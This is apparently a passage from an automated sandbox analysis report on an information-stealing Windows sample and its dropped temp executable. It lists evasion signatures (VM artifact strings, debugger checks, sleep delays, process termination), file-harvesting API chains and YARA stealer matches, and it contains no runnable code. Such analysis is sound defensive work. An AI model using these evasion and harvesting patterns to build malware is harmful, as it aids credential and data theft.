                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeWindow / User API: threadDelayed 5292Jump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeWindow / User API: threadDelayed 4695Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_1-30980
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-63841
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeAPI coverage: 5.1 %
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeAPI coverage: 2.9 %
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe TID: 7500Thread sleep count: 5292 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe TID: 7500Thread sleep time: -3820824s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe TID: 7500Thread sleep count: 4695 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe TID: 7500Thread sleep time: -3389790s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C84ED7 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C84ED7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C84EF0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_02C84EF0
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C8E657 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02C8E657
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C81607 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C81607
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C81620 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C81620
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C83CD7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C83CD7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C81C57 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02C81C57
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C8D037 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02C8D037
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C7DDE7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C7DDE7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C8D987 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C8D987
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C8E187 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_02C8E187
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C71907 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02C71907
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C71920 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_02C71920
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_00421DC0 EntryPoint,GetSystemInfo,GetUserDefaultLangID,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,OpenEventA,CreateEventA,1_2_00421DC0
                  Source: Amcache.hve.7.drBinary or memory string: VMware
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: 6X4BIzTTBR.exe, 00000000.00000003.4065357842.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000003.4064316717.0000000002C67000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000002.4091808818.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000002.4091842087.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DDA000.00000004.00000020.00020000.00000000.sdmp, ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp, ED60.tmp.exe, 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware\Kp
                  Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-31943
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-31935
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_00404A60 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,1_2_00404A60
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0042A3E3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3E3
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_00404A60 VirtualProtect 00000000,00000004,00000100,?1_2_00404A60
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0041EC6E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC6E
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0042FE6F mov eax, dword ptr fs:[00000030h]0_2_0042FE6F
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_02C0DA5B push dword ptr fs:[00000030h]0_2_02C0DA5B
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_047000D6 mov eax, dword ptr fs:[00000030h]0_2_047000D6
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046D0D90 mov eax, dword ptr fs:[00000030h]0_2_046D0D90
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046D092B mov eax, dword ptr fs:[00000030h]0_2_046D092B
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_004265A0 mov eax, dword ptr fs:[00000030h]1_2_004265A0
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C96807 mov eax, dword ptr fs:[00000030h]1_2_02C96807
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C70D90 mov eax, dword ptr fs:[00000030h]1_2_02C70D90
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C7092B mov eax, dword ptr fs:[00000030h]1_2_02C7092B
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02D6CD1B push dword ptr fs:[00000030h]1_2_02D6CD1B
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0043BBD1 GetProcessHeap,0_2_0043BBD1
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0042A3E3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3E3
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_004104E3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104E3
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_00410676 SetUnhandledExceptionFilter,0_2_00410676
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0040F927 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F927
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046FA64A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_046FA64A
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046E074A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_046E074A
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046E08DD SetUnhandledExceptionFilter,0_2_046E08DD
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046DFB8E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_046DFB8E
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C97A2F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_02C97A2F
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C99BF0 SetUnhandledExceptionFilter,1_2_02C99BF0
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C98011 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_02C98011
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeMemory protected: page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara matchFile source: Process Memory Space: ED60.tmp.exe PID: 7532, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_004248B0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,1_2_004248B0
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C94A87 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,1_2_02C94A87
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C94B17 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,1_2_02C94B17
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeProcess created: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe "C:\Users\user\AppData\Local\Temp\ED60.tmp.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0041078B cpuid 0_2_0041078B
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B01A
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetLocaleInfoW,0_2_004351D0
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: EnumSystemLocalesW,0_2_0043B2DD
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: EnumSystemLocalesW,0_2_0043B292
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: EnumSystemLocalesW,0_2_0043B378
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B405
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetLocaleInfoW,0_2_0043B655
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B77E
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetLocaleInfoW,0_2_0043B885
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B952
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: EnumSystemLocalesW,0_2_00434DDD
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetLocaleInfoW,0_2_04705437
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: EnumSystemLocalesW,0_2_0470B4F9
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: EnumSystemLocalesW,0_2_0470B544
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: EnumSystemLocalesW,0_2_0470B5DF
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: EnumSystemLocalesW,0_2_04705044
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0470B281
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetLocaleInfoW,0_2_0470B8BC
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0470B9E5
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetLocaleInfoW,0_2_0470BAEC
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0470BBB9
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_02C93197
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_004103DD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103DD
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_00422C10 GetProcessHeap,HeapAlloc,GetUserNameA,1_2_00422C10
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C96767 GetTimeZoneInformation,1_2_02C96767
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_004163FA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163FA
                  Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: 1.3.ED60.tmp.exe.2cb0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.ED60.tmp.exe.2c70e67.1.unpack, type: UNPACKEDPE
